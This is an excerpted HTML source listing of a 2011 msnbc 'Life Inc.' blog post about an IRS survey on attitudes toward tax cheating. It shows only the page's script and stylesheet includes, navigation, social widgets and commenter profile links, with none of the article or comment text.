<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e2a5a79d215988ddb0f116d757365d6a810c2d2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/d1e431bda25a167e695fb05acc6e0492371d9a89.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/todaymartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/lifeinc/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5936478&rand=1156475061&do=todayshow.com&rf=http%3A%2F%2Flifeinc.todayshow.com%2F_news%2F2011%2F01%2F28%2F5936478-good-graph-friday-what-cheat-on-taxes-never%3Fgt1%3D43001&ad=68:68:279;44::;70:70:276;68:68:279;74:74:278" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i1"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li class="i2"><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a>
...[SNIP]...
<li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a>
...[SNIP]...
<li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i10"><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li class="i11"><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i15"><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li class="i16"><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li class="i17"><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="i21"><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i1">
               <a href="http://www.msnbc.redacted/" class="site-msnbc">msnbc.com</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i7 show-thelastword"><a href="http://thelastword.msnbc.redacted/">The Last Word</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
</a><a href="http://today.msnbc.redacted/" class="homelink"></a>
...[SNIP]...
<br />Life Inc. is about how the economy is affecting you: your life, your job, your family, your finances, your spending. Check us out on <a href="http://www.facebook.com/pages/Today-Money/152222541478430">Facebook</a> or follow us on <a href="http://twitter.com/todaymoney">Twitter.</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://lifeinc.todayshow.com/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Today-Money/152222541478430" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5940862" data-contentId="5940862" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:500px;"><img id="allison-linnmsnbc/5940862.jpg" src="http://www.polls.newsvine.com/_vine/images/users/500/allison-linnmsnbc/5940862.jpg" width="500" height="285" alt="" /><div class="photo_credit_container">
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">survey of 1,000 Americans</a>
...[SNIP]...
<p>Update: A reader points out that the study was done by the <a target="_blank" href="http://www.treasury.gov/irsob/">IRS Oversight Board</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/sm-mail.png" alt="Send idea"/></span>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Facebook-icon2.gif" alt="Facebook" width="16" height="16"/></span> <a href="http://www.facebook.com/todaymoney">Follow us on Facebook</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Twitter-icon2.gif" alt="Twitter" width="16" height="16"/></span> <a href="http://twitter.com/todaymoney/">Follow us on Twitter</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/alert.gif" alt="E-mail alerts" width="16" height="16"/></span> <a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">Sign up for e-mail alerts</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="todaymoney" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never" data-Text="Good Graph Friday: What? Cheat on taxes? Never">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://agbroadhurst.newsvine.com/">Arthur G. Broadhurst</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BorsiaII.newsvine.com/">Borsia-II</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://smmfdmh.newsvine.com/">smmfdmh</a>
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">IRS survey of 1,000 Americans</a>
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">IRS survey of 1,000 Americans</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="nbc"><a href="http://allison-linnmsnbc.newsvine.com/">Allison Linn</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://smellyloretta.newsvine.com/">Gregorovich</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cygnus-x-1.newsvine.com/">Cygnus_X-1</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<p><a href="http://cygnus-x-1.newsvine.com/">Cygnus_X-1</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://peteroid69.newsvine.com/">Peteroid</a>
...[SNIP]...
<div class="normal"><a href="http://IHATETHEGOVT.newsvine.com/">I HATE THE GOVT!!</a>
...[SNIP]...
<div class="normal"><a href="http://BorsiaII.newsvine.com/">Borsia-II</a>
...[SNIP]...
<div class="normal"><a href="http://alice-mc.newsvine.com/">Alice Mc</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Ann1638814.newsvine.com/">Ann-1638814</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cschick2317.newsvine.com/">cschick2317</a>
...[SNIP]...
<div class="normal"><a href="http://stevenkatz2.newsvine.com/">Steven Katz</a>
...[SNIP]...
<div class="normal"><a href="http://Debi-1314897.newsvine.com/">Debi-1314897</a>
...[SNIP]...
<div class="normal"><a href="http://teapartyfan.newsvine.com/">tea-party-fan</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://rick--ws--nc.newsvine.com/">Rick, WS, NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://trust2112.newsvine.com/">Michael Coats</a>
...[SNIP]...
<div class="normal"><a href="http://DMC2990950.newsvine.com/">DMC-2990950</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://bill-horin.newsvine.com/">Bill Horin</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Becky2120568.newsvine.com/">Becky-2120568</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://knightrider3.newsvine.com/">knightrider-2370569</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<div class="normal"><a href="http://thesenatehealth.newsvine.com/">keith n</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://sukdu.newsvine.com/">Sue-612917</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fredevil.newsvine.com/">Fred Evil</a>
...[SNIP]...
<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<p><a href="http://sukdu.newsvine.com/">Sue-612917</a>
...[SNIP]...
<div class="normal"><a href="http://bday.newsvine.com/">Beth-440386</a>
...[SNIP]...
<div class="normal"><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Takethatback.newsvine.com/">Take that back.</a>
...[SNIP]...
<div class="normal"><a href="http://smoss73.newsvine.com/">Pondering-1159100</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://guylittle-1.newsvine.com/">GuyLittle</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fredevil.newsvine.com/">Fred Evil</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star15" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://mjweir.newsvine.com/">mj-1451595</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://stretch291.newsvine.com/">stretch291</a>
...[SNIP]...
<div class="normal"><a href="http://ideaguy2.newsvine.com/">Idea Guy</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star16" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://derek-brockman.newsvine.com/">Derek-908696</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jstoler4156.newsvine.com/">jan-315534</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star17" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://littleadv.newsvine.com/">littleadv</a>
...[SNIP]...
<p><a href="http://bit.ly/gFYrpS">http://bit.ly/gFYrpS</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://cathy15.newsvine.com/">Woodyspond</a>
...[SNIP]...
<div class="normal"><a href="http://DMC2990950.newsvine.com/">DMC-2990950</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star18" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://JimHenigman.newsvine.com/">Jim Henigman</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Zarkon.newsvine.com/">Steve-1309027</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star19" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Haste502.newsvine.com/">Haste502</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BillMarvell.newsvine.com/">Bill Marvell</a>
...[SNIP]...
<div class="normal"><a href="http://add42162.newsvine.com/">Tony-353256</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://johnthefree.newsvine.com/">jed233</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://TWL.newsvine.com/">Azrancher</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://benlam1.newsvine.com/">JobSeeker</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://roger-4.newsvine.com/">Roger Walsh-477587</a>
...[SNIP]...
<div class="normal"><a href="http://msk2877762.newsvine.com/">msk-2877762</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://bertfw.newsvine.com/">Bertfw</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://benlam1.newsvine.com/">JobSeeker</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star20" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeBrooks.newsvine.com/">Mike Brooks</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://johnthefree.newsvine.com/">jed233</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://n-wentworth.newsvine.com/">Rubytuesday57</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n-wentworth.newsvine.com/">Rubytuesday57</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://roger-4.newsvine.com/">Roger Walsh-477587</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://jerry194283.newsvine.com/">jerry194283</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://TrudyP.newsvine.com/">Trudy P</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://settersperch.newsvine.com/">settersperch</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://yankinyerchain.newsvine.com/">yankinyerchain</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpcyphers.newsvine.com/">Cyphers</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
<div class="avatar"><a href="http://allison-linnmsnbc.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/allison-linnmsnbc-846208182.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://www.evetahmincioglu.com/web/blog/">Career Diva</a>
...[SNIP]...
<li><a href="http://blogs.consumerreports.org/money/">Consumer Reports Money</a>
...[SNIP]...
<li><a href="http://norris.blogs.nytimes.com/">Floyd Norris</a>
...[SNIP]...
<li><a href="http://www.ritholtz.com/blog/">The Big Picture</a>
...[SNIP]...
<li><a href="http://consumerist.com/">The Consumerist</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/juggle/">The Juggle</a>
...[SNIP]...
<li><a href="http://www.suddenlyfrugal.com/">Suddenly Frugal</a>
...[SNIP]...
<li><a href="http://blogs.consumerreports.org/baby/">Consumer Reports Baby & Kids</a>
...[SNIP]...
<li><a href="http://www.economist.com/blogs/freeexchange">The Economist Free Exchange</a>
...[SNIP]...
<li><a href="http://bucks.blogs.nytimes.com/">Bucks</a></li><li><a href="http://blog.penelopetrunk.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://onthejob.45things.com/">On the Job</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo">Want more Life Inc.? Follow me on <a href="http://twitter.com/alinnmsnbc">Twitter</a>, check us out on <a href="http://www.facebook.com/home.php?#!/pages/Life-Inc/135937546449321?ref=ts">Facebook</a>
...[SNIP]...
<li><a href="http://moms.today.com/">TODAY Moms</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted">msnbc.com</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/32027560">About us</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/32359544/">Contact</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/3303511/">Help</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/html/HtmlSitemap0.html">Site map</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/27365695/">Careers</a>
...[SNIP]...
<li>
